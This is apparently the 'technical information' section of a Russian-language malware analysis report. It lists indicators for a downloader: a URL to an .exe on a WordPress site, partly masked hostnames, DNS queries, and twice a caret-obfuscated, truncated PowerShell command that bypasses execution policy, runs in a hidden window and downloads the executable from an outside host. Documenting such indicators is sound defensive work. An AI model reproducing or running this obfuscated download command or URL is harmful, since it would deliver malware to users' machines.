Техническая информация
- http://nexcontech.com/wp-content/ay4te/mdp5.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poW^eRshELl.Ex^e^ -e^xEc^Ut^I^Onp^O^LIcy ^byP^as^s ^-N^opROfi^Le^ -^WIN^dOwstY^Le^ ^H^id^DE^N (New^-^obJ^E^cT SYST^E^m.NEt.^WEB^c^L^I^EN^T).D^OWnL^O^aDFile('http://nexcontech....
- %APPDATA%.exe
- 'ne###ntech.com':80
- 'ht##.#odhosting.net':80
- http://ne###ntech.com/wp-content/Ay4TE/mdp5.exe
- http://ht##.#odhosting.net/404.html
- DNS ASK ne###ntech.com
- DNS ASK ht##.#odhosting.net
- '<SYSTEM32>\cmd.exe' /c "poW^eRshELl.Ex^e^ -e^xEc^Ut^I^Onp^O^LIcy ^byP^as^s ^-N^opROfi^Le^ -^WIN^dOwstY^Le^ ^H^id^DE^N (New^-^obJ^E^cT SYST^E^m.NEt.^WEB^c^L^I^EN^T).D^OWnL^O^aDFile('http://nexcontech....' (со скрытым окном)